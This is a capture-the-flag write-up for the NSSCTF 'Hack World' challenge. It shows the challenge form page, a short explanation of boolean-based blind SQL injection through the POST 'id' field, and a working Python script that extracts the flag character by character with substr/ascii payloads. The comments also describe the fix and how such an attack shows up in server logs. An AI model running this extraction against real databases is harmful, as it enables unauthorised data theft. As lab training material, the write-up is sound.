题目
<!-- saved from url=(0043)http://node4.anna.nssctf.cn:28181/index.php -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hack World</title>
</head>
<body>
<h3>All You Want Is In Table 'flag' and the column is 'flag'</h3>
<h3>Now, just give the id of passage</h3>
<form action="http://node4.anna.nssctf.cn:28181/index.php" method="POST">
<input type="text" name="id">
<input type="submit">
</form>
</body></html>
思路
这是一道通过 POST 参数 id 进行的布尔型 SQL 盲注：注入条件为真时页面回显包含 "Hello"，以此逐位判断 flag 的每个字符。
EXP
import string
import requests
import time # 导入时间模块用于添加等待时间
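# Boolean-oracle extraction loop for the challenge page above.
#
# The only signal this script relies on is that the server's response body
# contains "Hello" when the injected condition is true and not otherwise.
# That response difference is the entire oracle: answering uniformly and
# binding `id` as a query parameter instead of interpolating it would remove
# it. Server-side, a run of this script is visible as a burst of POSTs to
# index.php whose `id` values differ only in the substr() position and the
# compared character code, one position roughly every second.

URL = "http://node4.anna.nssctf.cn:28181/index.php"
# Marker the page emits on the true branch of the injected condition.
TRUE_MARKER = "Hello"
# Positions 1..MAX_LENGTH-1 are probed; the original used range(1, 60).
MAX_LENGTH = 60
# Pause (seconds) after each resolved position, as in the original.
DELAY_SECONDS = 1
# Seconds to wait for one response; without it a stalled connection
# hangs the whole run (requests.post has no default timeout).
REQUEST_TIMEOUT = 10


def build_payload(position, ascii_code):
    """Return the page's payload comparing one flag character to *ascii_code*.

    Args:
        position: 1-based index into the flag (SQL substr() is 1-based).
        ascii_code: candidate character code for that position.

    Returns:
        The `id` value to POST; the string is unchanged from the original.
    """
    return 'if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)'.format(position, ascii_code)


def condition_holds(page_text):
    """Return True when the response body carries the true-branch marker."""
    return TRUE_MARKER in page_text


def find_char(position):
    """Try every printable character at *position*.

    Returns:
        The matching character, or None when no candidate matched.
    """
    for ch in string.printable:
        print(f"Trying position {position} with character '{ch}'...")
        post = {"id": build_payload(position, ord(ch))}
        result = requests.post(url=URL, data=post, timeout=REQUEST_TIMEOUT)
        if condition_holds(result.text):
            return ch
    return None


def main():
    """Recover the flag one position at a time and print progress."""
    res = ""
    for position in range(1, MAX_LENGTH):
        ch = find_char(position)
        if ch is None:
            # No candidate matched: assume the end of the flag was reached.
            print(f"No character found at position {position}. Stopping...")
            break
        res += ch
        print(f"Found character at position {position}: '{ch}'")
        print(f"Current flag: {res}")
        time.sleep(DELAY_SECONDS)
    print("Final flag:", res)


main()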